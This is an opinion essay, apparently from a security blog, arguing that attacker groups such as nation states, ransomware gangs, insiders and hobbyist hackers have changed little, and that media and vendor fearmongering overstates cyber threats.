Stoking fears about the threat landscape is a popular approach, and one that I don’t particularly care for. Many will tell you that the threat landscape is constantly changing, that threats are getting more complex, and that actors are getting more sophisticated.
“The whole world is getting more difficult and scarier, so buy our stuff!”
There’s a ton of media sensationalism too, with the popular image of the hacker sitting at a computer, wearing a dark hoodie. As I’ll discuss here, that image MIGHT only describe one category of threat actor, but really does not apply at all to the others. The reality is both more interesting and more mundane than we give it credit for.
Yes, threat techniques do get more complex over time, but that’s simply a result of the technology arms race between security researchers, defenders, software vendors, OS vendors, etc., and then threat actors who take advantage of more sophisticated techniques. But, in many cases, they don’t. Breaches such as those conducted by the hacker collective LAPSUS$ were pulled off via social engineering, a tactic as old as time–in hacking, of course. Many of them are just good at talking people into giving up the goods.
The tactics that exploit software must get more complex out of necessity. There’s a saying in InfoSec: “Back in my day, we ran code directly on the stack,” which just refers to being able to exploit a bare metal computer and work directly with the CPU. Things have evolved such that you just can’t do that anymore. There are OS-level protections like address randomization, and protected areas of memory, plus the whole concept of a virtual machine (VM). There was no need for something like a virtual machine escape in 1999, because there was no such thing as a virtual machine.
It used to be that if an attacker found one exploitable service, they had root on the machine. To be able to do that now, attackers have to chain together five or six different exploits to get around different protections and mitigations to get that same access, because those mitigations and protections now exist and they didn’t in the past.
These new techniques are both necessary and difficult to understand. The only people who really get them are malware developers, advanced threat actors, security researchers and the vendors of surveillance software. If you’re a CISO reading about some of these instances of advanced threat techniques, you might think the world is a crazy place and you’re in danger.
That could be true of the software, but it’s not true of the people. Those threat actor groupings are pretty much unchanged in the modern era. The Stuxnet incident, where nation-state actors infiltrated an Iranian uranium enrichment facility and destroyed their centrifuges, was a turning point where we saw advanced persistent threats had gotten to an incredible point. Similarly, ransomware incidents were a turning point in terms of what “cybergangs” could do. But everything’s been pretty stable in terms of threat complexity since then. Insider threats have been around as long as Rolodexes and physical plans for products have been around. You can always steal from your employer, whether maliciously or not. And non-professional hacking enthusiasts have been around for decades too.
Let’s talk about each of these groups of attackers in detail, and look at how they’ve changed, or not changed, throughout the years.
Let’s go back to Stuxnet for a second. It opened the world’s eyes to two nation states that were very, very good at cyber warfare, and kicked their capabilities into real high gear. It tipped everybody off to some of the techniques involved, that they had designed malware specifically for the systems they attacked.
All of a sudden, it was clear that the cyber warfare that had been predicted had just had very, very real world consequences. What else had these attackers been up to? And for how long? But, that was the time when it came into its own in the public eye.
People have been doing scams with computers as long as computers have been in mass adoption, and in my view, ransomware has been pretty stable over the last five-to-10 years or so.
It sprung up on the scene with high profile incidents, especially around healthcare. The gangs have evolved how they interact with their victims to a degree, but it’s all incremental change. They have been organized with the same semi-corporate organization for a while. They’ve introduced some things like ransomware as a service, or affiliates, other ways to monetize, besides just directly blackmailing a victim into paying a ransom.
These are changes in tactics. Any reasonable corporation is going to change their tactics over time to respond to the business climate, and that’s essentially what ransomware gangs are doing. They’re not cybercriminals out to wreak havoc or steal secrets; they’re just trying to make dough.
Defenders are learning how to control the battle space better to make life difficult for attackers, and buy themselves time to detect those attackers. Technology is getting better. Some of it is an appropriate focus on operating system event logging to detect people, as opposed to some magic EDR thing. I think there’s a constantly improving understanding of how attackers live off the land and how they behave. That’s made life easier.
The threat of ransomware has not grown more complex. It’s exactly the same as it was five years ago.
For insiders at a company, there’s either malicious intent or negligence. A malicious insider could be disgruntled, or out to try to sell some of your company’s data to a competitor.
Our understanding of insider threats is murky at the corporate level. At the government level, we’ve got whistleblowers who are doing this for supposedly productive or patriotic reasons. When you go down to the broad base of the pyramid of insider threats, it’s everything from a contract employee stealing plans for a mobile device testing machine and selling them to a competitor, to people cracking software for their corporate laptop. Like the other areas I’ve described, this stuff hasn’t meaningfully changed.
If anything, the defense against insider threats has gotten better as the attack surface gets reduced. For insiders, some of that is identity federation. A lot of it is just policy. You know to flag an employee who might steal stuff, and you have them escorted out of the building when you get rid of them. To some degree, maybe digital loss prevention has helped, but policy is more important.
Another factor to consider is the advent of BYOD, and versions of zero trust, where your device doesn’t have any inherent trust relationship with the network. Many organizations now are just giving employees a laptop off the shelf, and any work they do is through SaaS platforms and APIs. As a CISO, you don’t actually have to really worry about device management anymore, because if your user infects their device, its access is limited.
For that reason, dealing with insider threats can be easier, and not as complex, as it was in the past.
You would be surprised how many people in infosec got into it because they were bored teenagers. Maybe, like me, they had a couple hours a day unsupervised at home and an obsession with computers. What they actually do with all that time on their hands has evolved through the years, from stealing Internet access to stealing info to playing childish pranks.
They tend to vastly overestimate their own skill, relative to the defender’s ability to thwart them. But every once in a while, through a little cleverness, they can be the teenager that hijacks Twitter’s critical controls and is able to access any account.
You’ll hear scary headlines day in and day out about this stuff. If you don’t have a level of technical literacy, just the sheer volume of cyber incidents might lead you to believe that the world is getting worse. But the reality is that as people gain technical literacy, running stories about cyber incidents becomes more and more of a productive and profitable media strategy. As the saying goes: if it bleeds, it leads.
And yet, as I’ve laid out here, things have gotten better. In the US, Congress passed the Cyber Incident Reporting for Critical Infrastructure Act in 2022 that creates mandatory disclosures of any kind of data breach, which is a very good thing. We can’t manage threats well unless we have a database of incidents, how they happened, and what corrective actions were taken, either at a company level or a general policy level.
A lot of breaches that formerly would’ve been swept under the rug so that a corporation can maintain their rep are going to make the news. We’re going to hear more and more about them, but that doesn’t mean attacks are getting more complex or it’s getting more difficult to deal with them. If anything, as we get more defenders into the workforce, it’s going to get easier to combat.